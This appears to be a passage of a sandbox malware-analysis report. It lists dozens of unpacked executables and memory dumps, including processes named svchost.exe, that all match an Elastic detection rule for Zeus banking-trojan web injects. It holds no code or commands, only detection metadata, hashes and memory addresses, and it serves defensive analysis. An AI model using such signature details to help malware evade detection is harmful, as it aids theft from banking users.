    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.781218.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.77b218.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.47.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.48.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2ab0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 9.2.tGYLgZxMWmmBTD.exe.2bd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.3f90000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1843970657.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1887006927.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1889204820.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1897674355.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1899518628.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
